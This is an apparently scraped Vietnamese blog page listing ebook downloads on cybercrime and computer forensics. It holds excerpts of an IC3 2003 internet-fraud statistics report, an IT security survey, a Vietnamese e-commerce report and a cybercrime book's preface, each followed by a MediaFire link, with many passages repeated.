Phần đầu điểm qua tình hình CNTT quốc tế và ảnh h-ởng của tình hình này đối với Việt nam. Các
phần tiếp theo phân tích và đánh giá hiện trạng của những nội dung quan trọng nhất trong phát triển
sản xuất và ứng dụng CNTT tại Việt nam. Do thời gian và số liệu có hạn, các phân tích và đánh giá
ch-a thể thực sự sâu sắc và toàn diện. Hội Tin Học TP Hồ Chí Minh mong nhận đ-ợc các thông tin
thêm vá các ý kiến đóng góp để có thể có đ-ợc bức tranh đầy đủ hơn về CNTT n-ớc ta.
http://www.mediafire.com/?d18xo7b5ccbp445
Ban Công nghệ thông tin và Thương mại điện tử xin trân trọng cảm ơn Ban Giám
đốc dự án ẢNH HƯỞNG CỦA CÁC YẾU TỐ MÔI TRƯỞNG CHÍNH SÁCH CHO PHÁT TRIỂN THƯƠNG
MẠI ĐIỆN TỬ Ở VIỆT NAM, BỘ KHOA HỌC VÀ CÔNG NGHỆ đã hỗ trợ, tạo điều kiện cho
chúng tôi thực hiện Báo cáo này.
Nhân cơ hội này chúng tôi xin gửi lời cảm ơn tới các doanh nghiệp và cá nhân đã
trả lời phiếu điều tra và đã tiếp đón chúng tôi nồng nhiệt trong quá trình phỏng vấn
về nhiều vấn đề liên quan tới hiện trạng ứng dụng TMĐT cũng như các ý tưởng về
tầm quan trọng của chính sách hỗ trợ phát triển TMĐT trong những năm tới.
Tiến sỹ Đỗ Văn Lộc, Chánh văn phòng CNTT Bộ Khoa học và Công nghệ kiêm
Giám đốc Dự án, đã giúp đỡ rất lớn cho toàn bộ quá trình khảo sát. Tiến sỹ Trần
Ngọc Ca, Phó Viện trưởng Viện nghiên cứu chiến lược và phát triển công nghệ Bộ
Khoa học và Công nghệ, có nhiều góp ý sâu sắc về phương pháp điều tra và thiết
kế phiếu điều tra.
Báo cáo này không thể hoàn thành nếu thiếu sự say mê và mong muốn đóng góp
cho sự phát triển TMĐT ở Việt nam của Thạc sỹ kinh tế Vũ Bá Phú và toàn thể
cán bộ Ban CNTT và TMĐT.
http://www.mediafire.com/?z9vmj6uddpmc6tl
đốc dự án ẢNH HƯỞNG CỦA CÁC YẾU TỐ MÔI TRƯỞNG CHÍNH SÁCH CHO PHÁT TRIỂN THƯƠNG
MẠI ĐIỆN TỬ Ở VIỆT NAM, BỘ KHOA HỌC VÀ CÔNG NGHỆ đã hỗ trợ, tạo điều kiện cho
chúng tôi thực hiện Báo cáo này.
Nhân cơ hội này chúng tôi xin gửi lời cảm ơn tới các doanh nghiệp và cá nhân đã
trả lời phiếu điều tra và đã tiếp đón chúng tôi nồng nhiệt trong quá trình phỏng vấn
về nhiều vấn đề liên quan tới hiện trạng ứng dụng TMĐT cũng như các ý tưởng về
tầm quan trọng của chính sách hỗ trợ phát triển TMĐT trong những năm tới.
Tiến sỹ Đỗ Văn Lộc, Chánh văn phòng CNTT Bộ Khoa học và Công nghệ kiêm
Giám đốc Dự án, đã giúp đỡ rất lớn cho toàn bộ quá trình khảo sát. Tiến sỹ Trần
Ngọc Ca, Phó Viện trưởng Viện nghiên cứu chiến lược và phát triển công nghệ Bộ
Khoa học và Công nghệ, có nhiều góp ý sâu sắc về phương pháp điều tra và thiết
kế phiếu điều tra.
Báo cáo này không thể hoàn thành nếu thiếu sự say mê và mong muốn đóng góp
cho sự phát triển TMĐT ở Việt nam của Thạc sỹ kinh tế Vũ Bá Phú và toàn thể
cán bộ Ban CNTT và TMĐT.
http://www.mediafire.com/?z9vmj6uddpmc6tl
Ban Công nghệ thông tin và Thương mại điện tử xin trân trọng cảm ơn Ban Giám
đốc dự án ẢNH HƯỞNG CỦA CÁC YẾU TỐ MÔI TRƯỞNG CHÍNH SÁCH CHO PHÁT TRIỂN THƯƠNG
MẠI ĐIỆN TỬ Ở VIỆT NAM, BỘ KHOA HỌC VÀ CÔNG NGHỆ đã hỗ trợ, tạo điều kiện cho
chúng tôi thực hiện Báo cáo này.
Nhân cơ hội này chúng tôi xin gửi lời cảm ơn tới các doanh nghiệp và cá nhân đã
trả lời phiếu điều tra và đã tiếp đón chúng tôi nồng nhiệt trong quá trình phỏng vấn
về nhiều vấn đề liên quan tới hiện trạng ứng dụng TMĐT cũng như các ý tưởng về
tầm quan trọng của chính sách hỗ trợ phát triển TMĐT trong những năm tới.
Tiến sỹ Đỗ Văn Lộc, Chánh văn phòng CNTT Bộ Khoa học và Công nghệ kiêm
Giám đốc Dự án, đã giúp đỡ rất lớn cho toàn bộ quá trình khảo sát. Tiến sỹ Trần
Ngọc Ca, Phó Viện trưởng Viện nghiên cứu chiến lược và phát triển công nghệ Bộ
Khoa học và Công nghệ, có nhiều góp ý sâu sắc về phương pháp điều tra và thiết
kế phiếu điều tra.
Báo cáo này không thể hoàn thành nếu thiếu sự say mê và mong muốn đóng góp
cho sự phát triển TMĐT ở Việt nam của Thạc sỹ kinh tế Vũ Bá Phú và toàn thể
cán bộ Ban CNTT và TMĐT.
http://www.mediafire.com/?z9vmj6uddpmc6tl
đốc dự án ẢNH HƯỞNG CỦA CÁC YẾU TỐ MÔI TRƯỞNG CHÍNH SÁCH CHO PHÁT TRIỂN THƯƠNG
MẠI ĐIỆN TỬ Ở VIỆT NAM, BỘ KHOA HỌC VÀ CÔNG NGHỆ đã hỗ trợ, tạo điều kiện cho
chúng tôi thực hiện Báo cáo này.
Nhân cơ hội này chúng tôi xin gửi lời cảm ơn tới các doanh nghiệp và cá nhân đã
trả lời phiếu điều tra và đã tiếp đón chúng tôi nồng nhiệt trong quá trình phỏng vấn
về nhiều vấn đề liên quan tới hiện trạng ứng dụng TMĐT cũng như các ý tưởng về
tầm quan trọng của chính sách hỗ trợ phát triển TMĐT trong những năm tới.
Tiến sỹ Đỗ Văn Lộc, Chánh văn phòng CNTT Bộ Khoa học và Công nghệ kiêm
Giám đốc Dự án, đã giúp đỡ rất lớn cho toàn bộ quá trình khảo sát. Tiến sỹ Trần
Ngọc Ca, Phó Viện trưởng Viện nghiên cứu chiến lược và phát triển công nghệ Bộ
Khoa học và Công nghệ, có nhiều góp ý sâu sắc về phương pháp điều tra và thiết
kế phiếu điều tra.
Báo cáo này không thể hoàn thành nếu thiếu sự say mê và mong muốn đóng góp
cho sự phát triển TMĐT ở Việt nam của Thạc sỹ kinh tế Vũ Bá Phú và toàn thể
cán bộ Ban CNTT và TMĐT.
http://www.mediafire.com/?z9vmj6uddpmc6tl
|
Posted under:
COMPUTER FORENSIC,
EBOOK. COMPUTER CRIME,
NƯỚC NGOÀI,
THỐNG KE
|
0
comments
Read more
In December 2003, the Internet Fraud Complaint Center (IFCC) was renamed the Internet Crime Complaint Center
(IC3) to better reflect the broad character of such matters having a cyber (Internet) nexus. The 2003 Internet Fraud
Report is the third annual compilation of information on complaints received and referred by the IC3 to law
enforcement or regulatory agencies for appropriate action. From January 1, 2003 – December 31, 2003, the IC3 and
IFCC websites received 124,509 complaint submissions. These filings were composed of fraudulent and non-
fraudulent complaints primarily related to the Internet.
IC3 referred 95,064 complaints to enforcement agencies on behalf of the filing individuals. These complaints were
composed of many different fraud types such as auction fraud, non-delivery, and credit/debit card fraud, as well as
non-fraudulent complaints, such as computer intrusions, spam/unsolicited e-mail, and child pornography.
From the submissions, IC3 referred 63,316 complaints of fraud, the majority of which were committed over the
Internet or similar online service. The total dollar loss from all referred cases of fraud was $125.6 million with a
median dollar loss of $329 per complaint. Significant findings include:
• Internet auction fraud was still by far the most reported offense, comprising 61.0% of referred complaints. Non-
delivered merchandise and/or payment accounted for 20.9% of complaints. Credit/debit card fraud made up
6.9% of complaints. Check Fraud, identity theft, business fraud, and investment fraud round out the top seven
categories of complaints referred to law enforcement during the year (all at 1.0% or more).
• Among those individuals who reported a dollar loss, the highest median dollar losses were found among
Nigerian letter fraud, identity theft, and check fraud complainants.
• Among perpetrators, nearly 79% were male and half resided in one of the following states: California, New
York, Florida, Texas, Pennsylvania, and Illinois. The majority of reported perpetrators were from the United
States. However, perpetrators also had a representation in Canada, Nigeria, Italy, Spain, and Romania.
• Among complainants, 70% were male, half were between the ages of 30 and 50 (39.4 average age) and over
one-third resided in one of the four most populated states: California, Florida, Texas, and New York. While
most were from the United States, IC3 received a number of complaints from Canada, Australia, Great Britain,
Germany, and Japan.
• Males lost more money than females. This may be a function of both online purchasing differences by gender
and the type of fraudulent schemes the individual were victimized by.
• Electronic mail (E-mail) and web pages were the two primary mechanisms by which the fraudulent contact took
place. In all, 64.8% of complainants reported that they had e-mail contact with the perpetrator and 19.4% had
contact through a web page.
http://www.mediafire.com/?8v460ffdf8pnvml
(IC3) to better reflect the broad character of such matters having a cyber (Internet) nexus. The 2003 Internet Fraud
Report is the third annual compilation of information on complaints received and referred by the IC3 to law
enforcement or regulatory agencies for appropriate action. From January 1, 2003 – December 31, 2003, the IC3 and
IFCC websites received 124,509 complaint submissions. These filings were composed of fraudulent and non-
fraudulent complaints primarily related to the Internet.
IC3 referred 95,064 complaints to enforcement agencies on behalf of the filing individuals. These complaints were
composed of many different fraud types such as auction fraud, non-delivery, and credit/debit card fraud, as well as
non-fraudulent complaints, such as computer intrusions, spam/unsolicited e-mail, and child pornography.
From the submissions, IC3 referred 63,316 complaints of fraud, the majority of which were committed over the
Internet or similar online service. The total dollar loss from all referred cases of fraud was $125.6 million with a
median dollar loss of $329 per complaint. Significant findings include:
• Internet auction fraud was still by far the most reported offense, comprising 61.0% of referred complaints. Non-
delivered merchandise and/or payment accounted for 20.9% of complaints. Credit/debit card fraud made up
6.9% of complaints. Check Fraud, identity theft, business fraud, and investment fraud round out the top seven
categories of complaints referred to law enforcement during the year (all at 1.0% or more).
• Among those individuals who reported a dollar loss, the highest median dollar losses were found among
Nigerian letter fraud, identity theft, and check fraud complainants.
• Among perpetrators, nearly 79% were male and half resided in one of the following states: California, New
York, Florida, Texas, Pennsylvania, and Illinois. The majority of reported perpetrators were from the United
States. However, perpetrators also had a representation in Canada, Nigeria, Italy, Spain, and Romania.
• Among complainants, 70% were male, half were between the ages of 30 and 50 (39.4 average age) and over
one-third resided in one of the four most populated states: California, Florida, Texas, and New York. While
most were from the United States, IC3 received a number of complaints from Canada, Australia, Great Britain,
Germany, and Japan.
• Males lost more money than females. This may be a function of both online purchasing differences by gender
and the type of fraudulent schemes the individual were victimized by.
• Electronic mail (E-mail) and web pages were the two primary mechanisms by which the fraudulent contact took
place. In all, 64.8% of complainants reported that they had e-mail contact with the perpetrator and 19.4% had
contact through a web page.
http://www.mediafire.com/?8v460ffdf8pnvml
In December 2003, the Internet Fraud Complaint Center (IFCC) was renamed the Internet Crime Complaint Center
(IC3) to better reflect the broad character of such matters having a cyber (Internet) nexus. The 2003 Internet Fraud
Report is the third annual compilation of information on complaints received and referred by the IC3 to law
enforcement or regulatory agencies for appropriate action. From January 1, 2003 – December 31, 2003, the IC3 and
IFCC websites received 124,509 complaint submissions. These filings were composed of fraudulent and non-
fraudulent complaints primarily related to the Internet.
IC3 referred 95,064 complaints to enforcement agencies on behalf of the filing individuals. These complaints were
composed of many different fraud types such as auction fraud, non-delivery, and credit/debit card fraud, as well as
non-fraudulent complaints, such as computer intrusions, spam/unsolicited e-mail, and child pornography.
From the submissions, IC3 referred 63,316 complaints of fraud, the majority of which were committed over the
Internet or similar online service. The total dollar loss from all referred cases of fraud was $125.6 million with a
median dollar loss of $329 per complaint. Significant findings include:
• Internet auction fraud was still by far the most reported offense, comprising 61.0% of referred complaints. Non-
delivered merchandise and/or payment accounted for 20.9% of complaints. Credit/debit card fraud made up
6.9% of complaints. Check Fraud, identity theft, business fraud, and investment fraud round out the top seven
categories of complaints referred to law enforcement during the year (all at 1.0% or more).
• Among those individuals who reported a dollar loss, the highest median dollar losses were found among
Nigerian letter fraud, identity theft, and check fraud complainants.
• Among perpetrators, nearly 79% were male and half resided in one of the following states: California, New
York, Florida, Texas, Pennsylvania, and Illinois. The majority of reported perpetrators were from the United
States. However, perpetrators also had a representation in Canada, Nigeria, Italy, Spain, and Romania.
• Among complainants, 70% were male, half were between the ages of 30 and 50 (39.4 average age) and over
one-third resided in one of the four most populated states: California, Florida, Texas, and New York. While
most were from the United States, IC3 received a number of complaints from Canada, Australia, Great Britain,
Germany, and Japan.
• Males lost more money than females. This may be a function of both online purchasing differences by gender
and the type of fraudulent schemes the individual were victimized by.
• Electronic mail (E-mail) and web pages were the two primary mechanisms by which the fraudulent contact took
place. In all, 64.8% of complainants reported that they had e-mail contact with the perpetrator and 19.4% had
contact through a web page.
http://www.mediafire.com/?8v460ffdf8pnvml
(IC3) to better reflect the broad character of such matters having a cyber (Internet) nexus. The 2003 Internet Fraud
Report is the third annual compilation of information on complaints received and referred by the IC3 to law
enforcement or regulatory agencies for appropriate action. From January 1, 2003 – December 31, 2003, the IC3 and
IFCC websites received 124,509 complaint submissions. These filings were composed of fraudulent and non-
fraudulent complaints primarily related to the Internet.
IC3 referred 95,064 complaints to enforcement agencies on behalf of the filing individuals. These complaints were
composed of many different fraud types such as auction fraud, non-delivery, and credit/debit card fraud, as well as
non-fraudulent complaints, such as computer intrusions, spam/unsolicited e-mail, and child pornography.
From the submissions, IC3 referred 63,316 complaints of fraud, the majority of which were committed over the
Internet or similar online service. The total dollar loss from all referred cases of fraud was $125.6 million with a
median dollar loss of $329 per complaint. Significant findings include:
• Internet auction fraud was still by far the most reported offense, comprising 61.0% of referred complaints. Non-
delivered merchandise and/or payment accounted for 20.9% of complaints. Credit/debit card fraud made up
6.9% of complaints. Check Fraud, identity theft, business fraud, and investment fraud round out the top seven
categories of complaints referred to law enforcement during the year (all at 1.0% or more).
• Among those individuals who reported a dollar loss, the highest median dollar losses were found among
Nigerian letter fraud, identity theft, and check fraud complainants.
• Among perpetrators, nearly 79% were male and half resided in one of the following states: California, New
York, Florida, Texas, Pennsylvania, and Illinois. The majority of reported perpetrators were from the United
States. However, perpetrators also had a representation in Canada, Nigeria, Italy, Spain, and Romania.
• Among complainants, 70% were male, half were between the ages of 30 and 50 (39.4 average age) and over
one-third resided in one of the four most populated states: California, Florida, Texas, and New York. While
most were from the United States, IC3 received a number of complaints from Canada, Australia, Great Britain,
Germany, and Japan.
• Males lost more money than females. This may be a function of both online purchasing differences by gender
and the type of fraudulent schemes the individual were victimized by.
• Electronic mail (E-mail) and web pages were the two primary mechanisms by which the fraudulent contact took
place. In all, 64.8% of complainants reported that they had e-mail contact with the perpetrator and 19.4% had
contact through a web page.
http://www.mediafire.com/?8v460ffdf8pnvml
Almost one third of organisations experienced an electronic attack which harmed the
confidentiality, integrity or availability of their systems. Of these organisations, 15%
experienced more than 10 attacks.
Nearly two thirds of respondents thought their organisation needed to do more to ensure an
appropriate level of IT security qualification, training, experience or awareness among staff
and management.
Half of respondents used, or followed as a guide, IT security related standards.
One third or organisations thought their current level of IT security funding was adequate.
Over half of respondents were victim to Nigerian-style internet scams.
Nearly half of the respondents which experienced an electronic attack chose not to report the
incident to any external organisation
http://www.mediafire.com/?m04t6v49gnvi8mv
Almost one third of organisations experienced an electronic attack which harmed the
confidentiality, integrity or availability of their systems. Of these organisations, 15%
experienced more than 10 attacks.
Nearly two thirds of respondents thought their organisation needed to do more to ensure an
appropriate level of IT security qualification, training, experience or awareness among staff
and management.
Half of respondents used, or followed as a guide, IT security related standards.
One third or organisations thought their current level of IT security funding was adequate.
Over half of respondents were victim to Nigerian-style internet scams.
Nearly half of the respondents which experienced an electronic attack chose not to report the
incident to any external organisation
http://www.mediafire.com/?m04t6v49gnvi8mv
|
Posted under:
COMPUTER FORENSIC,
CYBERCRIME,
EBOOK. COMPUTER CRIME,
NƯỚC NGOÀI,
THỐNG KE,
TỘI PHẠM MÁY TÍNH
|
0
comments
Read more
Xem toàn văn ở đây
Bộ luật Tố tụng hình sự 2003
hoặc download
http://www.mediafire.com/?soj43vyxxjhmk3t
Bộ luật Tố tụng hình sự 2003
hoặc download
http://www.mediafire.com/?soj43vyxxjhmk3t
Xem toàn văn ở đây
Bộ luật Tố tụng hình sự 2003
hoặc download
http://www.mediafire.com/?soj43vyxxjhmk3t
Bộ luật Tố tụng hình sự 2003
hoặc download
http://www.mediafire.com/?soj43vyxxjhmk3t
This book would not have been possible without the combined efforts of some very talented people.
I would first like to thank my agent, Carole McClendon of Waterside Productions for her assistance
in again finding me a superb publisher. I would also like to thank the hard-working
individuals at Wiley Publishing who helped to make this book a reality. Their enthusiasm and support
were a continued shot in the arm. In particular, I would like to thank Acquisitions Editor,
Katie Feltman for her confidence in me and for helping me to shape and hone the initial outline
for the book. I am also grateful to Project Editor, Mark Enochs for all his suggestions. I would like
to say thank you to my wife and best friend, Monique, for without her help, this book would not
have been possible. I tip my hat to Russ Shumway who, as my technical editor, did a superb job
ensuring that all my facts were correct and who suggested a number of additions that kept this
book technically sound. Thanks, as well, to my sons Deran and Alex for their enduring patience
with me while I spent many long hours writing.
link download (no password):
http://www.mediafire.com/?d3yld79z60h6icm
This book would not have been possible without the combined efforts of some very talented people.
I would first like to thank my agent, Carole McClendon of Waterside Productions for her assistance
in again finding me a superb publisher. I would also like to thank the hard-working
individuals at Wiley Publishing who helped to make this book a reality. Their enthusiasm and support
were a continued shot in the arm. In particular, I would like to thank Acquisitions Editor,
Katie Feltman for her confidence in me and for helping me to shape and hone the initial outline
for the book. I am also grateful to Project Editor, Mark Enochs for all his suggestions. I would like
to say thank you to my wife and best friend, Monique, for without her help, this book would not
have been possible. I tip my hat to Russ Shumway who, as my technical editor, did a superb job
ensuring that all my facts were correct and who suggested a number of additions that kept this
book technically sound. Thanks, as well, to my sons Deran and Alex for their enduring patience
with me while I spent many long hours writing.
link download (no password):
http://www.mediafire.com/?d3yld79z60h6icm
|
Posted under:
COMPUTER FORENSIC,
CYBERCRIME,
EBOOK. COMPUTER CRIME,
NƯỚC NGOÀI
|
0
comments
Read more
Today we live and work in a world of global connectivity. We can exchange casual conversation or
conduct multimillion-dollar monetary transactions with people on the other side of the planet
quickly and inexpensively. The proliferation of personal computers, easy access to the Internet, and a
booming market for related new communications devices have changed the way we spend our leisure
time and the way we do business.
The ways in which criminals commit crimes are also changing. Universal digital accessibility opens
new opportunities for the unscrupulous. Millions of dollars are lost by both businesses and consumers to
computer-savvy criminals. Worse, computers and networks can be used to harass victims or set them up
for violent attacks—even to coordinate and carry out terrorist activities that threaten us all. Unfortunately,
in many cases law enforcement agencies have lagged behind these criminals, lacking the technology and
the trained personnel to address this new and growing threat, which aptly has been termed cybercrime.
Even though interest and awareness of the cybercrime phenomenon have grown in recent years,
many information technology (IT) professionals and law enforcement officers have lacked the tools
and expertise needed to tackle the problem. To make matters worse, old laws didn’t quite fit the crimes
being committed, new laws hadn’t quite caught up to the reality of what was happening, and there
were few court precedents to look to for guidance. Furthermore, debates over privacy issues hampered
the ability of enforcement agents to gather the evidence needed to prosecute these new cases. Finally,
there was a certain amount of antipathy—or at the least, distrust—between the two most important
players in any effective fight against cybercrime: law enforcement agents and computer professionals.
Yet, close cooperation between the two is crucial if we are to control the cybercrime problem and
make the Internet a safe “place” for its users.
Law enforcement personnel understand the criminal mindset and know the basics of gathering
evidence and bringing offenders to justice. IT personnel understand computers and networks, how
they work, and how to track down information on them. Each has half of the key to defeating the
cybercriminal. This book’s goal is to bring the two elements together, to show how they can and
must work together to defend against, detect, and prosecute people who use modern technology
to harm individuals, organizations, businesses, and society.
link download (no password) :)):
http://www.mediafire.com/?d3yld79z60h6icm